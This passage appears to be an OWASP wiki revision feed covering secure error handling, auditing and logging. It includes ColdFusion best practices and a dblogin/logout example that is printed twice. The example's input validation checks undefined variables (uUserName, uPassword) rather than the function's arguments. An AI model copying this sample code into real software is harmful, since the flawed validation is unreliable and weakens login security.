* For highly protected systems, ensure there is end-to-end trust in the logging mechanism. World writeable logs, logging agents without credentials (such as SNMP traps, syslog etc) are legally vulnerable to being excluded from prosecution &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Oracle Auditing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sans.org/atwork/description.php?cid=738&amp;lt;/u&amp;gt;   [[category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
* Sarbanes Oxley for IT security&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/columnists/322&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Java Logging Overview&lt;br /&gt;
&amp;lt;u&amp;gt;http://java.sun.com/javase/6/docs/technotes/guides/logging/overview.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Error Handling and Logging ==&lt;br /&gt;
&lt;br /&gt;
All applications have failures – whether they occur during compilation or runtime. Most programming languages will throw runtime exceptions for illegally executing code (e.g. syntax errors) often in the form of cryptic system messages. These failures and resulting system messages can lead to several security risks if not handled properly including; enumeration, buffer attacks, sensitive information disclosure, etc.  If an attack occurs it is important that forensics personnel be able to trace the attacker’s tracks via adequate logging.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides structured exception handling and logging tools. These tools can help developers customize error handling to prevent unwanted disclosure, and provide customized logging for error tracking and audit trails. These tools should be combined with web server, J2EE application server, and operating system tools to create the full system/application security overview.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Error Handling'''&lt;br /&gt;
&lt;br /&gt;
Hackers can use the information exposed by error messages. Even missing templates errors (HTTP 404) can expose your server to attacks (e.g. buffer overflow, XSS, etc.). If you enable the Robust Exception Information debugging option, ColdFusion will display:&lt;br /&gt;
&lt;br /&gt;
Physical path of template &lt;br /&gt;
&lt;br /&gt;
URI of template &lt;br /&gt;
&lt;br /&gt;
Line number and line snippet &lt;br /&gt;
&lt;br /&gt;
SQL statement used (if any) &lt;br /&gt;
&lt;br /&gt;
Data source name (if any) &lt;br /&gt;
&lt;br /&gt;
Java stack trace&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides tags and functions for developers to use to customize error handling. Administrators can specify default templates in the ColdFusion Administrator (CFAM) to handle unknown or unhandled exceptions. ColdFusion’s structure exception handling works in the following order:&lt;br /&gt;
&lt;br /&gt;
Template level (ColdFusion templates and components)&lt;br /&gt;
&lt;br /&gt;
ColdFusion exception handling tags: cftry, cfcatch, cfthrow, and cfrethrow&lt;br /&gt;
&lt;br /&gt;
try and catch statements in CFScript&lt;br /&gt;
&lt;br /&gt;
Application level (Application.cfc/cfm)&lt;br /&gt;
&lt;br /&gt;
Specify custom templates for individual exceptions types with the cferror tag&lt;br /&gt;
&lt;br /&gt;
Application.cfc onError method to handle uncaught application exceptions&lt;br /&gt;
&lt;br /&gt;
System level (ColdFusion Administrator settings)&lt;br /&gt;
&lt;br /&gt;
Missing Template Handler execute when a requested ColdFusion template is not found&lt;br /&gt;
&lt;br /&gt;
Site-wide Error Handler executes globally for all unhandled exceptions on the server&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices '''&lt;br /&gt;
&lt;br /&gt;
*Do not allow exceptions to go unhandled&lt;br /&gt;
&lt;br /&gt;
*Do not allow any exceptions to reach the browser&lt;br /&gt;
&lt;br /&gt;
*Display custom error pages to users with an email link for feedback&lt;br /&gt;
&lt;br /&gt;
*Do not enable “Robust Exception Information” in production.&lt;br /&gt;
&lt;br /&gt;
*Specify custom pages for ColdFusion to display in each of the following cases: &lt;br /&gt;
**When a ColdFusion page is missing (the Missing Template Handler page) &lt;br /&gt;
**When an otherwise-unhandled exception error occurs during the processing of a page (the Site-wide Error Handler page) &lt;br /&gt;
**You specify these pages on the Settings page in the Server Settings are in the ColdFusion MX Administrator; for more information, see the ColdFusion MX Administrator Help.&lt;br /&gt;
&lt;br /&gt;
*Use the cferror tag to specify ColdFusion pages to handle specific types of errors. &lt;br /&gt;
&lt;br /&gt;
*Use the cftry, cfcatch, cfthrow, and cfrethrow tags to catch and handle exception errors directly on the page where they occur. &lt;br /&gt;
&lt;br /&gt;
*In CFScript, use the try and catch statements to handle exceptions. &lt;br /&gt;
&lt;br /&gt;
*Use the onError event in Application.cfc to handle exception errors that are not handled by try/catch code on the application pages. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Logging'''&lt;br /&gt;
&lt;br /&gt;
Log files can help with application debugging and provide audit trails for attack detection. ColdFusion provides several logs for different server functions. It leverages the Apache Log4j libraries for customized logging. It also provides logging tags to assist in application debugging. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following is a partial list of ColdFusion log files and their descriptions''' '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
&lt;br /&gt;
 || Log file  || Description &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || application.log || Records every ColdFusion MX error reported to a user. Application page errors, including ColdFusion MX syntax, ODBC, and SQL errors, are written to this log file.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || exception.log  || Records stack traces for exceptions that occur in ColdFusion.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || scheduler.log || Records scheduled events that have been submitted for execution. Indicates whether task submission was initiated and whether it succeeded. Provides the scheduled page URL, the date and time executed, and a task ID.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || server.log || Records start up messages and errors for ColdFusion MX.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || customtag.log || Records errors generated in custom tag processing.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || mail.log || Records errors generated by an SMTP mail server.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || mailsent.log || Records messages sent by ColdFusion MX.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || flash.log || Records entries for Macromedia Flash Remoting.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The CFAM contains the Logging Settings and log viewer screens. Administrators can configure the log directory, maximum log file size, and maximum number of archives. It also allows administrators to log slow running pages, CORBA calls, and scheduled task execution. The log viewer allows viewing, filtering, and searching of any log files in the log directory (default is cf_root/logs). Administrators can archive, save, and delete log files as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The cflog and cftrace tags allow developers to create customized logging. &amp;lt;cflog&amp;gt; can write custom messages to the Application.log, Scheduler.log, or a custom log file. The custom log file must be in the default log directory – if it does not exist ColdFusion will create it. &amp;lt;cftrace&amp;gt; tracks execution times, logic flow, and variable at the time the tag executes. It records the data in the cftrace.log (in the default logs directory) and can display this info either inline or in the debugging output of the current page request. Use &amp;lt;cflog&amp;gt; to write custom error messages, track user logins, and record user activity to a custom log file.  Use &amp;lt;cftrace&amp;gt; to track variables and application state within running requests.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cflog&amp;gt; for customized logging&lt;br /&gt;
&lt;br /&gt;
*Incorporate into custom error handling&lt;br /&gt;
&lt;br /&gt;
*Record application specific messages&lt;br /&gt;
&lt;br /&gt;
*Actively monitor and fix errors in ColdFusion’s logs&lt;br /&gt;
&lt;br /&gt;
*Optimize logging settings &lt;br /&gt;
&lt;br /&gt;
*Rotate log files to keep them current &lt;br /&gt;
&lt;br /&gt;
*Keep files size manageable&lt;br /&gt;
&lt;br /&gt;
*Enable logging of slow running pages&lt;br /&gt;
&lt;br /&gt;
*Set the time interval lower than the configured Timeout Request value in the CFAM Settings screen&lt;br /&gt;
&lt;br /&gt;
*Long running page timings are recorded in the server.log&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cftrace&amp;gt; sparingly for audit trails&lt;br /&gt;
&lt;br /&gt;
*Use with inline=“false”&lt;br /&gt;
&lt;br /&gt;
*Use it to track user input – Form and/or URL variables&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices in Action'''''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following code adds error handling and logging to the dbLogin and logout methods in the code from Authentication section.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, uUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, uPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Error Handling]]&lt;br /&gt;
[[Category:Logging]]&lt;br /&gt;
[[Category:OWASP Logging Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59848</id>
		<title>Error Handling, Auditing and Logging</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59848"/>
				<updated>2009-05-02T10:40:15Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Objective */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
Many industries are required by legal and regulatory requirements to be:&lt;br /&gt;
&lt;br /&gt;
* Auditable – all activities that affect user state or balances are formally tracked&lt;br /&gt;
&lt;br /&gt;
* Traceable – it’s possible to determine where an activity occurs in all tiers of the application&lt;br /&gt;
&lt;br /&gt;
* High integrity – logs cannot be overwritten or tampered with by local or remote users&lt;br /&gt;
&lt;br /&gt;
Well-written applications will dual-purpose logs and activity traces for audit and monitoring, and make it easy to track a transaction without excessive effort or access to the system. They should possess the ability to easily track or identify potential fraud or anomalies end-to-end.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed, but in particular:&lt;br /&gt;
&lt;br /&gt;
DS11.4 Source data error handling&lt;br /&gt;
&lt;br /&gt;
DS11.8 Data input error handling&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Error handling, debug messages, auditing and logging are different aspects of the same topic: how to track events within an application:&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
==Best practices ==&lt;br /&gt;
&lt;br /&gt;
* Fail safe – do not fail open&lt;br /&gt;
&lt;br /&gt;
* Dual purpose logs&lt;br /&gt;
&lt;br /&gt;
* Audit logs are legally protected – protect them&lt;br /&gt;
&lt;br /&gt;
* Reports and search logs using a read-only copy or complete replica &lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
Error handling takes two forms: structured exception handling and functional error checking. Structured exception handling is always preferred as it is easier to cover 100% of code. Functional languages, such as PHP 4, that do not have exceptions are very hard to cover 100% of all errors. Code that covers 100% of errors is extraordinarily verbose and difficult to read, and can contain subtle bugs and errors in the error handling code itself.&lt;br /&gt;
&lt;br /&gt;
Motivated attackers like to see error messages as they might leak information that leads to further attacks, or may leak privacy related information. Web application error handling is rarely robust enough to survive a penetration test. &lt;br /&gt;
&lt;br /&gt;
Applications should always fail safe. If an application fails to an unknown state, it is likely that an attacker may be able to exploit this indeterminate state to access unauthorized functionality, or worse create, modify or destroy data.&lt;br /&gt;
&lt;br /&gt;
===Fail safe ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s fatal error handler.&lt;br /&gt;
&lt;br /&gt;
* Does it fail safe? If so, how?&lt;br /&gt;
&lt;br /&gt;
* Is the fatal error handler called frequently enough?&lt;br /&gt;
&lt;br /&gt;
* What happens to in-flight transactions and ephemeral data?&lt;br /&gt;
&lt;br /&gt;
===Debug errors ===&lt;br /&gt;
&lt;br /&gt;
* Does production code contain debug error handlers or messages?  &lt;br /&gt;
&lt;br /&gt;
* If the language is a scripting language without effective pre-processing or compilation, can the debug flag be turned on in the browser?&lt;br /&gt;
&lt;br /&gt;
* Do the debug messages leak privacy related information, or information that may lead to further successful attack?&lt;br /&gt;
&lt;br /&gt;
===Exception handling ===&lt;br /&gt;
&lt;br /&gt;
* Does the code use structured exception handlers (try {} catch {} etc) or function-based error handling? &lt;br /&gt;
&lt;br /&gt;
* If the code uses function-based error handling, does it check every return value and handle the error appropriately?&lt;br /&gt;
&lt;br /&gt;
* Would fuzz injection against the average interface fail? &lt;br /&gt;
&lt;br /&gt;
===Functional return values ===&lt;br /&gt;
&lt;br /&gt;
Many languages indicate an error condition by return value. E.g.:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$query = mysql_query(“SELECT * FROM table WHERE id=4”, $conn);&lt;br /&gt;
&lt;br /&gt;
if ( $query === false ) {&lt;br /&gt;
&lt;br /&gt;
		// error&lt;br /&gt;
&lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Are all functional errors checked? If not, what can go wrong?&lt;br /&gt;
&lt;br /&gt;
==Detailed error messages ==&lt;br /&gt;
&lt;br /&gt;
Detailed error messages provide attackers with a mountain of useful information.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable  ===&lt;br /&gt;
&lt;br /&gt;
* Are detailed error messages turned on? &lt;br /&gt;
&lt;br /&gt;
* Do the detailed error messages leak information that may be used to stage a further attack, or leak privacy related information? &lt;br /&gt;
&lt;br /&gt;
* Does the browser cache the error message?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Ensure that your application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.&lt;br /&gt;
&lt;br /&gt;
Production code should not be capable of producing debug messages. If it does, debug mode should be triggered by editing a file or configuration option on the server. In particular, debug should not enabled be an option in the application itself.&lt;br /&gt;
&lt;br /&gt;
If the framework or language has a structured exception handler (i.e. try {} catch {}), it should be used in preference to functional error handling.&lt;br /&gt;
&lt;br /&gt;
If the application uses functional error handling, its use must be comprehensive and thorough.&lt;br /&gt;
&lt;br /&gt;
Detailed error messages, such as stack traces or leaking privacy related information, should never be presented to the user. Instead a generic error message should be used. This includes HTTP status response codes (i.e. 404 or 500 Internal Server error).&lt;br /&gt;
&lt;br /&gt;
==Logging ==&lt;br /&gt;
&lt;br /&gt;
===Where to log to? ===&lt;br /&gt;
&lt;br /&gt;
Logs should be written so that the log file attributes are such that only new information can be written (older records cannot be rewritten or deleted). For added security, logs should also be written to a write once / read many device such as a CD-R.&lt;br /&gt;
&lt;br /&gt;
Copies of log files should be made at regular intervals depending on volume and size (daily, weekly, monthly, etc.).  A common naming convention should be adopted with regards to logs, making them easier to index. Verification that logging is still actively working is overlooked surprisingly often, and can be accomplished via a simple cron job!&lt;br /&gt;
&lt;br /&gt;
Make sure data is not overwritten.&lt;br /&gt;
&lt;br /&gt;
Log files should be copied and moved to permanent storage and incorporated into the organization's overall backup strategy.&lt;br /&gt;
&lt;br /&gt;
Log files and media should be deleted and disposed of properly and incorporated into an organization's shredding or secure media disposal plan. Reports should be generated on a regular basis, including error reporting and anomaly detection trending.&lt;br /&gt;
&lt;br /&gt;
Be sure to keep logs safe and confidential even when backed up.&lt;br /&gt;
&lt;br /&gt;
===Handling ===&lt;br /&gt;
&lt;br /&gt;
Logs can be fed into real time intrusion detection and performance and system monitoring tools. All logging components should be synced with a timeserver so that all logging can be consolidated effectively without latency errors. This time server should be hardened and should not provide any other services to the network.&lt;br /&gt;
&lt;br /&gt;
No manipulation, no deletion while analyzing.&lt;br /&gt;
&lt;br /&gt;
===General Debugging ===&lt;br /&gt;
&lt;br /&gt;
Logs are useful in reconstructing events after a problem has occurred, security related or not. Event reconstruction can allow a security administrator to determine the full extent of an intruder's activities and expedite the recovery process.&lt;br /&gt;
&lt;br /&gt;
===Forensics evidence ===&lt;br /&gt;
&lt;br /&gt;
Logs may in some cases be needed in legal proceedings to prove wrongdoing. In this case, the actual handling of the log data is crucial.&lt;br /&gt;
&lt;br /&gt;
===Attack detection ===&lt;br /&gt;
&lt;br /&gt;
Logs are often the only record that suspicious behavior is taking place: Therefore logs can sometimes be fed real-time directly into intrusion detection systems.&lt;br /&gt;
&lt;br /&gt;
===Quality of service ===&lt;br /&gt;
&lt;br /&gt;
